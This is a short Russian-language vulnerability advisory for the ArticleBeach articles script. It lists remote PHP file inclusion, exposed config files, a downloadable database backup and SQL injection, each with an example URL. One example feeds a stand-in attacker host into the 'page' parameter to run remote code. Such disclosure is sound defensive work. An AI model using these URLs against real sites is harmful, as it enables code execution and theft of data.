Программа: ArticleBeach free articles

Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к
важным данным, произвести SQL-инъекцию и выполнить произвольный PHP код на
системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре “page” сценария “index.php”. Удаленный пользователь может с помощью
специально сформированного URL выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Пример:

http://victim/index.php?page=http://attacker_site/

2. Удаленный пользователь может просмотреть произвольные конфигурационныt файлы
в каталоге “/includes”.

Пример:

http://victim/includes/config.inc

3. Программное обеспечение хранит резервные копии базы данных в каталоге “ /backup”
в пределах корневой директории Web сервера. Удаленный пользователь может скачать
резервную копию базы данных.

Пример:

http://victim/backup/article_art_22122005.sql

4. Уязвимость существует из-за недостаточной обработки входных данных в
параметре “category_id” сценария “index.php”. Удаленный пользователь может с
помощью специально сформированного URL выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://victim/index.php?pg=3&page=category&category_id=[SQL]
 



Оставить мнение